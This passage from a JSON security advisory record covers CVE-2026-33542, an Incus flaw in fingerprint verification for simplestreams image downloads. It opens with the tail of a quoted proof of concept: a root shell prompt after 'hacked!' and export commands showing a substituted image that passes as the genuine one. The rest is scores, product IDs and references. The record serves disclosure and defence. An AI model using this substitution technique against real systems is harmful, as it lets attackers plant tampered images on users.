hacked!\nroot@star-mollusk:~# \nexit\n$ incus image export images:debian/trixie\nImage exported successfully!                  \n$ cat incus.tar.xz rootfs.squashfs | sha256sum\n945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369  -\n$ rm incus.tar.xz rootfs.squashfs\n$ incus image export poc:debian/trixie\nImage exported successfully!                   
\n$ cat incus.tar.xz rootfs.squashfs | sha256sum\nd3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002  -\n$ rm incus.tar.xz rootfs.squashfs\n$ incus image export local:945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\nError: Image fingerprint doesn't match. Got d3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002 expected 945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\n$ incus image export poc:945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\nImage exported successfully!                   \n$ cat incus.tar.xz rootfs.squashfs | sha256sum\nd3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002  -\n```",
                    "title": "github - https://api.github.com/advisories/GHSA-p8mm-23gg-jc9r"
                },
                {
                    "category": "description",
                    "text": "Incus does not verify combined fingerprint when downloading images from simplestreams servers",
                    "title": "microsoft - https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar"
                },
                {
                    "category": "other",
                    "text": "0.00038",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:P/VC:L/VI:H/VA:N/SC:H/SI:L/SA:N",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "7.0",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "4.8",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "VENDOR FIX as product remediation category",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "There is exploit data available from source Nvd, Exploit code publicly available, There is cvss data available from source a private source",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 3\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "first_fixed": [
                    "CSAFPID-5969890"
                ],
                "known_affected": [
                    "CSAFPID-5919453",
                    "CSAFPID-5944290",
                    "CSAFPID-5965579",
                    "CSAFPID-5956312",
                    "CSAFPID-5956314"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33542"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33542.json"
                },
                {
                    "category": "external",
                    "summary": "Source - debian",
                    "url": "https://security-tracker.debian.org/tracker/CVE-2026-33542"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33542.json"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-p8mm-23gg-jc9r.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-p8mm-23gg-jc9r"
                },
                {
                    "category": "external",
                    "summary": "Source - microsoft",
                    "url": "https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/lxc/incus/security/advisories/GHSA-p8mm-23gg-jc9r"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-33542"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33542"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://github.com/lxc/incus/commit/04e97418189f743411884afb81a3384e6218b8cd"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://github.com/lxc/incus/commit/4a80447c52d6bc05d3322feeb5395f581e7a80e4"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://github.com/lxc/incus/commit/72688b7d9400c8f3c17ad0f93a7c1aeb89627307"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://github.com/lxc/incus/commit/ee26f72524ab60a4abcfd4e52667c52bb24364fc"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://github.com/lxc/incus/releases/tag/v6.23.0"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-p8mm-23gg-jc9r"
                }
            ],
            "remediations": [
                {
                    "category": "vendor_fix",
                    "details": "CBL-Mariner Releases",
                    "product_ids": [
                        "CSAFPID-5956312",
                        "CSAFPID-5956314"
                    ]
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
                        "baseScore": 8.5,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5919453",
                        "CSAFPID-5944290",
                        "CSAFPID-5956312",
                        "CSAFPID-5956314",
                        "CSAFPID-5965579"
                    ]
                }
            ],
            "title": "CVE-2026-33542"
        }
    ]
}